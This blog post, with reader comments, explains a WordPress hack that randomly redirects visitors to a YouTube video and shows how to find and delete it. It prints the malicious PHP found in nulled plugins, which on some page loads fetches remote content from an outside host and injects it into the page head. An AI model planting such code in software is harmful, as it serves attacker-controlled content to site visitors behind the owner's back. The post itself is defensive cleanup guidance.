[solved] WordPress Website getting redirected to Justin Bieber Youtube Video – Hack with Solution

Wordpress Redirection to Justin Bieber video

So one fine day, after a long gap, i wanted to see how my blog would look like. So i tried opening my blog’s home page. And it got redirected to a youtube video “Justin Bieber Trips Over While Playing Basketball with Scooter Braun – Funny!”. And the URL was “https://www.youtube.com/watch?v=RFngSCaY5nA”. And i was little shocked. Is my website hacked.? I reloaded it and it was all perfect.

Again after a 2 days, i got the same problem. My website got redirected to the same video. And i started monitoring my website’s code every time i load it. And nailed the problem finally. Someone / Some plugin have inserted this code into my blog’s homepage and it gets redirected.

<meta http-equiv=”refresh” content=”0; url=http://www.youtube.com/watch?v=RFngSCaY5nA”>

But still i couldn’t find the code in any of the themes. Or in the plugins I used. After a research in the web, i found the problem and decided to write about it.
wordpress website getting redirected to justin bieber video

The Actual Problem:

Your website (any page or post) will be automatically redirected to the Justin Bieber tripping video, randomly once few visits.

The actual URL or code will not be in the HTML code or source code of the website all the time, so it will be hard for you to find out.

The ‘virus’ will not be deactivated even if you deactivate the plugins. And so you cannot solve it by “deactivating and activating plugin method”

The hack code is not direct. And hence it is waste of time in checking PHP files for any hacks. I downloaded the whole FTP of wordpress and started searching all in vain.

What causes the Problem :

Finally i found the code which causes the problem of redirection. This is not the direct PHP code, but indirect.

f (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqqc2_chesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqqc2_chesk');}}

This code will be any of your plugins or themes, you have downloaded unofficially from any nulled plugins sites like Wplocker.

Solution :

The only solution to solve this problem is to check the presence of code, find it and delete the code or the plugin itself. Now how to find the file containing the code.

Wordpress Redirection to Justin Bieber video

Updated on 26 August 2014

  1. Download the whole worpress website wp-content folder from CPanel using FTP.
  2. Now download any application like gedit, that might be used to find a particular set of codes in a website. I used gedit.
  3. This application can be used to find spam code hidden in any PHP files, in a single click.
  4. The common URL found in all the spammed websites is http://spamcheckr.com/l.php
  5. Now start the application and search for the URL – http://spamcheckr.com/l.php only in the php type files.
  6. When you find the code, now delete the code or plugin in CPanel.
Malware code to be removed

Malware code to be removed

PS: In my blog, the malware code was found in GoPricing plugin.

Did you find an easier solution for this wordpress website hack? Share with me!!

Pin It

5 thoughts on “[solved] WordPress Website getting redirected to Justin Bieber Youtube Video – Hack with Solution

  1. Hi!
    I have the same problem, but I can’t find the link… nowhere ..I tried search it in all my wp folder and nothing.. Any advices please?

  2. Hi Vignesh,
    i Have this problem and i found the hack code in settings_js.php file witch found in Viral lock plugin.
    And after i deleted the code the plugin stop work!!
    I need this plugin and i need to remove these hack problem, Please help…

Leave a Reply

Your email address will not be published. Required fields are marked *